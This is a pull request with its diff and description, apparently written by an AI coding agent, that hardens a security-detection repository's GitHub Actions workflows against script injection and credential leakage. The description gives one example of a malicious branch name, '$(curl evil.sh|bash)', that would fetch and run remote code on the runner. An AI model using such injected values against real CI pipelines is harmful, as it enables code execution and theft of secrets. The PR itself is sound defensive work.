### PR TITLE
Harden GitHub Actions workflows against script injection (EPD-6521)

### DIFF
--- a/.github/actions/changed_files/action.yml
+++ b/.github/actions/changed_files/action.yml
@@ -12,9 +12,15 @@ runs:
       uses: tj-actions/changed-files@22103cc46bda19c2b464ffe86db46df6922fd323
     - name: List affected files
       if: ${{ steps.changed_files.outputs.all_changed_files != '' }}
+      env:
+        ALL_CHANGED_FILES: ${{ steps.changed_files.outputs.all_changed_files }}
       run: |
         echo "Affected files:"
-        for file in ${{ steps.changed_files.outputs.all_changed_files }}; do
+        # The list is space-separated and must word-split, so it is deliberately
+        # unquoted; set -f disables globbing so filenames are passed through verbatim.
+        set -f
+        # shellcheck disable=SC2086
+        for file in $ALL_CHANGED_FILES; do
           echo "- ${file}"
         done
       shell: bash

--- a/.github/workflows/check-deprecated.yml
+++ b/.github/workflows/check-deprecated.yml
@@ -17,6 +17,8 @@ jobs:
     steps:
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Fetch Release
         run: |

--- a/.github/workflows/check-mitre.yml
+++ b/.github/workflows/check-mitre.yml
@@ -14,6 +14,8 @@ jobs:
     steps:
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Set python version
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0

--- a/.github/workflows/check-packs.yml
+++ b/.github/workflows/check-packs.yml
@@ -19,6 +19,8 @@ jobs:
     steps:
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Set python version
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0

--- a/.github/workflows/docker.yml
+++ b/.github/workflows/docker.yml
@@ -15,6 +15,8 @@ jobs:
     steps:
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
       - uses: docker/setup-qemu-action@96fe6ef7f33517b61c61be40b68a1882f3264fb8 #v4.2.0
       - name: Set up Docker Buildx
         id: buildx

--- a/.github/workflows/generate-indexes.yml
+++ b/.github/workflows/generate-indexes.yml
@@ -41,11 +41,13 @@ jobs:
         run: python3 ./.scripts/generate_indexes.py
       - name: Commit Indexes
         continue-on-error: true # This is to ensure that the workflow does not fail if there are no changes to commit
+        env:
+          HEAD_REF: ${{ github.event.pull_request.head.ref }}
         run: |
           git config --global user.email "github-service-account-automation@panther.io"
           git config --global user.name "panther-bot-automation"
-          git fetch origin ${{ github.event.pull_request.head.ref }}:${{ github.event.pull_request.head.ref }}
-          git checkout ${{ github.event.pull_request.head.ref }}
+          git fetch origin -- "$HEAD_REF:$HEAD_REF"
+          git checkout "$HEAD_REF"
           git add ./indexes
           git commit -S -m "Update indexes"
-          git push origin ${{ github.event.pull_request.head.ref }}
+          git push origin -- "$HEAD_REF"

--- a/.github/workflows/invisible-characters.yml
+++ b/.github/workflows/invisible-characters.yml
@@ -18,6 +18,8 @@ jobs:
     steps:
       - name: Checkout
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1
+        with:
+          persist-credentials: false
       - name: Changed Files
         id: changed_files
         uses: ./.github/actions/changed_files
@@ -30,6 +32,8 @@ jobs:
     steps:
       - name: Checkout
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1
+        with:
+          persist-credentials: false
       - name: Set up Python
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0
         with:
@@ -60,13 +64,21 @@ jobs:
     steps:
       - name: Checkout
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1
+        with:
+          persist-credentials: false
       - name: Set up Python
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0
         with:
           python-version: '3.12'
 
       - name: Detect invisible characters
+        env:
+          CHANGED_FILES: ${{ needs.changed_files.outputs.changed_files }}
         run: |
+          # The list is space-separated and must word-split, so it is deliberately
+          # unquoted; set -f disables globbing so filenames are passed through verbatim.
+          set -f
+          # shellcheck disable=SC2086
           python .github/scripts/lint-invisible-characters/lint-invisible-characters.py \
-          ${{ needs.changed_files.outputs.changed_files }} \
+          $CHANGED_FILES \
           --ignore .github/scripts/lint-invisible-characters

--- a/.github/workflows/lint.yml
+++ b/.github/workflows/lint.yml
@@ -15,6 +15,8 @@ jobs:
     steps:
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Set python version
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0

--- a/.github/workflows/pre-release-upload.yml
+++ b/.github/workflows/pre-release-upload.yml
@@ -17,13 +17,15 @@ jobs:
       API_TOKEN: ${{ secrets.GA_API_TOKEN }}
     steps:
       - name: Validate Secrets
-        if: ${{ env.GA_API_HOST == '' || env.GA_API_TOKEN == '' }}
+        if: ${{ env.API_HOST == '' || env.API_TOKEN == '' }}
         run: |
           echo "API_HOST or API_TOKEN not set"
           exit 0
 
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Set python version
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0
@@ -38,4 +40,4 @@ jobs:
 
       - name: upload
         run: |
-          pipenv run panther_analysis_tool upload --api-host ${{ env.GA_API_HOST }} --api-token ${{ env.GA_API_TOKEN }}
+          pipenv run panther_analysis_tool upload --api-host "$API_HOST" --api-token "$API_TOKEN"

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -35,6 +35,9 @@ jobs:
           ref: ${{ github.event.inputs.branch }}
           fetch-depth: 0
           token: ${{ env.GITHUB_TOKEN }}
+          # Nothing here talks to a git remote (gh uses GITHUB_TOKEN from the env),
+          # so don't leave the bot PAT in .git/config for `make install` to reach.
+          persist-credentials: false
       - name: Configure AWS credentials
         uses: aws-actions/configure-aws-credentials@e6de054238d6b7531b4efff3b6587d9aade6a06c # v6.2.3
         with:
@@ -46,22 +49,29 @@ jobs:
         with:
           python-version: "3.11"
       - name: Create new panther-analysis release
+        env:
+          BUMP: ${{ github.event.inputs.bump }}
+          AWS_REGION: ${{ secrets.AWS_REGION }}
+          AWS_DEFAULT_REGION: ${{ secrets.AWS_REGION }}
+          KMS_KEY_ARN: ${{ secrets.KMS_KEY_ARN }}
+          SIGNING_ALGORITHM: ${{ secrets.SIGNING_ALGORITHM }}
+          DIGEST_FILE: ${{ secrets.DIGEST_FILE }}
         run: |
-          export AWS_REGION=${{ secrets.AWS_REGION }}
-          export AWS_DEFAULT_REGION=${{ secrets.AWS_REGION }}
-          export OLD_VERSION=$(gh release list | grep Latest | awk '{print $1}')
-          export NEW_VERSION=$(echo $OLD_VERSION | awk -F. -v bump="${{ github.event.inputs.bump }}" '{
+          OLD_VERSION=$(gh release list | grep Latest | awk '{print $1}')
+          NEW_VERSION=$(echo "$OLD_VERSION" | awk -F. -v bump="$BUMP" '{
             major=substr($1,2)+0; minor=$2+0; patch=$3+0;
             if (bump=="major") { major++; minor=0; patch=0 }
             else if (bump=="patch") { patch++ }
             else { minor++; patch=0 }
             printf "v%d.%d.%d", major, minor, patch
           }')
-          export RELEASE_SHA=$(git rev-parse HEAD)
+          RELEASE_SHA=$(git rev-parse HEAD)
           pip3 install --user pipenv
-          rm -rf $(pipenv --venv)
+          # pipenv --venv exits non-zero when no venv exists yet; don't let that abort the step
+          VENV_PATH=$(pipenv --venv 2>/dev/null || true)
+          if [ -n "$VENV_PATH" ]; then rm -rf "$VENV_PATH"; fi
           make install
-          pipenv run panther_analysis_tool release --kms-key ${{ secrets.KMS_KEY_ARN }}
-          openssl dgst -binary -sha512 panther-analysis-all.zip > ${{ secrets.DIGEST_FILE }}
-          aws kms verify --key-id ${{ secrets.KMS_KEY_ARN }} --signing-algorithm ${{ secrets.SIGNING_ALGORITHM }} --message fileb://${{ secrets.DIGEST_FILE }} --message-type DIGEST --output json --signature $(cat panther-analysis-all.sig) | jq '.SignatureValid'
-          gh release create $NEW_VERSION panther-analysis-all.* --title $NEW_VERSION --target $RELEASE_SHA --latest --generate-notes
+          pipenv run panther_analysis_tool release --kms-key "$KMS_KEY_ARN"
+          openssl dgst -binary -sha512 panther-analysis-all.zip > "$DIGEST_FILE"
+          aws kms verify --key-id "$KMS_KEY_ARN" --signing-algorithm "$SIGNING_ALGORITHM" --message "fileb://$DIGEST_FILE" --message-type DIGEST --output json --signature "$(cat panther-analysis-all.sig)" | jq '.SignatureValid'
+          gh release create "$NEW_VERSION" panther-analysis-all.* --title "$NEW_VERSION" --target "$RELEASE_SHA" --latest --generate-notes

--- a/.github/workflows/sync-from-upstream.yml
+++ b/.github/workflows/sync-from-upstream.yml
@@ -9,23 +9,30 @@ on:
 env:
   YOUR_REPO_PRIMARY_BRANCH_NAME: "main"
 
+permissions:
+  contents: read
+
 jobs:
   check_upstream:
     if: |
       github.repository != 'panther-labs/panther-analysis'
     runs-on: ubuntu-latest
+    permissions:
+      contents: write
+      pull-requests: write
     steps:
       - name: Set token
         id: set_token
+        env:
+          PANTHER_SYNC_UPSTREAM: ${{ secrets.PANTHER_SYNC_UPSTREAM }}
+          DEFAULT_TOKEN: ${{ secrets.GITHUB_TOKEN }}
         run: |
-          # Check if PANTHER_SYNC_UPSTREAM secret is available by trying to substitute it
-          PANTHER_SYNC_UPSTREAM="${{ secrets.PANTHER_SYNC_UPSTREAM }}"
           if [ -n "$PANTHER_SYNC_UPSTREAM" ]; then
             echo "Using PANTHER_SYNC_UPSTREAM for authentication"
-            echo "token=${{ secrets.PANTHER_SYNC_UPSTREAM }}" >> $GITHUB_OUTPUT
+            echo "token=$PANTHER_SYNC_UPSTREAM" >> "$GITHUB_OUTPUT"
           else
             echo "PANTHER_SYNC_UPSTREAM not found, using default GITHUB_TOKEN"
-            echo "token=${{ secrets.GITHUB_TOKEN }}" >> $GITHUB_OUTPUT
+            echo "token=$DEFAULT_TOKEN" >> "$GITHUB_OUTPUT"
           fi
 
       - uses: actions/github-script@3a2844b7e9c422d3c10d287c895573f7108da1b3 #v9.0.0
@@ -53,6 +60,9 @@ jobs:
       - name: Checkout your local repo in PR branch
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
         with:
+          # Credentials must persist: the Fork-Sync action below fetches from origin
+          # before it rewrites the remote URL with target_repo_token, which private
+          # forks need in order to authenticate.
           ref: "sync_upstream_${{steps.set_upstream.outputs.latest-release}}"
           token: ${{ steps.set_token.outputs.token }}
       # Sync this branch with upstream
@@ -74,18 +84,22 @@ jobs:
         id: create_pr
         name: Create a PR to bring upstream changes into the local repo primary branch
         if: steps.sync.outputs.has_new_commits == 'true'
+        env:
+          LATEST_RELEASE: ${{ steps.set_upstream.outputs.latest-release }}
+          PRIMARY_BRANCH: ${{ env.YOUR_REPO_PRIMARY_BRANCH_NAME }}
         with:
           github-token: ${{ steps.set_token.outputs.token }}
           result-encoding: string
           script: |
             const fs = require('fs');
+            const latestRelease = process.env.LATEST_RELEASE;
             try {
               const response = await github.rest.pulls.create({
-                owner: '${{github.repository_owner}}',
-                repo: '${{  github.event.repository.name }}',
-                title: 'sync this fork to panther-labs/panther-analysis ${{steps.set_upstream.outputs.latest-release}}',
-                head: 'sync_upstream_${{steps.set_upstream.outputs.latest-release}}',
-                base: '${{env.YOUR_REPO_PRIMARY_BRANCH_NAME}}',
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                title: `sync this fork to panther-labs/panther-analysis ${latestRelease}`,
+                head: `sync_upstream_${latestRelease}`,
+                base: process.env.PRIMARY_BRANCH,
               });
             } catch(e) {
               if (e.response && e.response.data && e.response.data.errors && e.response.data.errors.length > 0 && e.response.data.errors[0].message && e.response.data.errors[0].message.includes('No commits between')) {

--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -15,6 +15,8 @@ jobs:
     steps:
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Set python version
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0
@@ -48,6 +50,8 @@ jobs:
           
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Set python version
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0
@@ -62,7 +66,7 @@ jobs:
 
       - name: test
         run: |
-          pipenv run panther_analysis_tool test --api-host ${{ env.API_HOST }} --api-token ${{ env.API_TOKEN }} --show-failures-only
+          pipenv run panther_analysis_tool test --api-host "$API_HOST" --api-token "$API_TOKEN" --show-failures-only
 
   test-generate-versions:
     if: github.event.pull_request.head.repo.fork == false
@@ -71,6 +75,8 @@ jobs:
     steps:
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Set python version
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0
@@ -94,6 +100,8 @@ jobs:
     steps:
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Set python version
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0

--- a/.github/workflows/upload.yml
+++ b/.github/workflows/upload.yml
@@ -24,6 +24,8 @@ jobs:
 
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Set python version
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0
@@ -38,4 +40,4 @@ jobs:
 
       - name: upload
         run: |
-          pipenv run panther_analysis_tool upload --api-host ${{ env.API_HOST }} --api-token ${{ env.API_TOKEN }}
+          pipenv run panther_analysis_tool upload --api-host "$API_HOST" --api-token "$API_TOKEN"

--- a/.github/workflows/validate.yml
+++ b/.github/workflows/validate.yml
@@ -24,6 +24,8 @@ jobs:
 
       - name: Checkout panther-analysis
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 #v7.0.1
+        with:
+          persist-credentials: false
 
       - name: Set python version
         uses: actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97 #v7.0.0
@@ -38,4 +40,4 @@ jobs:
 
       - name: validate
         run: |
-          pipenv run panther_analysis_tool validate --api-host ${{ env.API_HOST }} --api-token ${{ env.API_TOKEN }}
+          pipenv run panther_analysis_tool validate --api-host "$API_HOST" --api-token "$API_TOKEN"


### PR DESCRIPTION
### Background

[EPD-6521](https://panther-labs.atlassian.net/browse/EPD-6521)

`${{ ... }}` is substituted into the script body *before* bash runs it, so a PR branch named `$(curl evil.sh|bash)` turns `run: git checkout ${{ github.event.pull_request.head.ref }}` into executable code on the runner. Fix throughout is to substitute into `env:` instead and reference `"$VAR"`, which bash expands as a value and never re-scans for `$(...)`.

### Changes

**Script injection — untrusted values moved to `env:`**

* `generate-indexes.yml` — `github.event.pull_request.head.ref` → `$HEAD_REF`. Added `--` before the refspecs (`git fetch origin -- "$HEAD_REF:$HEAD_REF"`, `git push origin -- "$HEAD_REF"`) so a leading-dash branch name can't be read as a flag.
* `invisible-characters.yml` + `.github/actions/changed_files/action.yml` — changed **filenames** flowed into `run:` blocks, and a PR author controls those (a file can be named `$(...)`). Now `$CHANGED_FILES` / `$ALL_CHANGED_FILES` with `set -f`, which keeps the intended word-splitting on the space-separated list while disabling glob expansion.
* `release.yml` — `workflow_dispatch` bump input and the KMS/region/digest secrets → step `env:`.
* `sync-from-upstream.yml` — in `actions/github-script`, interpolation into the JS body replaced with `context.repo.owner` / `context.repo.repo` and `process.env`.
* `test.yml`, `upload.yml`, `validate.yml`, `pre-release-upload.yml` — `--api-host ${{ env.API_HOST }}` → `--api-host "$API_HOST"`, so secrets come from the environment instead of the command line.

**Credential persistence — `persist-credentials: false`**

`actions/checkout` writes its token into `.git/config`, where later steps and dependency installs can read it.

* Added to checkouts whose jobs never reach a git remote (no `git fetch`/`push`/`pull` in `Makefile` or `.scripts/`; `gh` authenticates from the job env).
* Most relevant on `release.yml`, which persisted the bot PAT with `fetch-depth: 0` and then ran `pipenv install`.
* Left enabled where the job pushes with git: `generate-indexes.yml`, `generate-versions-file.yml`, and `sync-from-upstream.yml` — in the pinned `Fork-Sync-With-Upstream-action`, `get_updates.sh` fetches from `origin` before `push_updates.sh` rewrites the remote URL with `target_repo_token`, so private forks need it. Documented inline.

**Permissions**

* `sync-from-upstream.yml` — had no `permissions:` block and inherited the org default. Now `contents: read` at workflow level, `contents: write` + `pull-requests: write` on the job.

**Two behavioural fixes on the same lines**

* `pre-release-upload.yml` referenced `env.GA_API_HOST` / `env.GA_API_TOKEN` while the job defines `API_HOST` / `API_TOKEN`, so the upload ran with an empty `--api-host` and `--api-token`.
* `release.yml` — `rm -rf $(pipenv --venv)` couldn't just be quoted: GHA runs `bash -e` and `pipenv --venv` exits non-zero when no venv exists, so `rm -rf ""` would abort the step where the unquoted form tolerated it. Now guarded with `if [ -n "$VENV_PATH" ]`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)


[EPD-6521]: https://panther-labs.atlassian.net/browse/EPD-6521?atlOrigin=eyJpIjoiNWRkNTljNzYxNjVmNDY3MDlhMDU5Y2ZhYzA5YTRkZjUiLCJwIjoiZ2l0aHViLWNvbS1KU1cifQ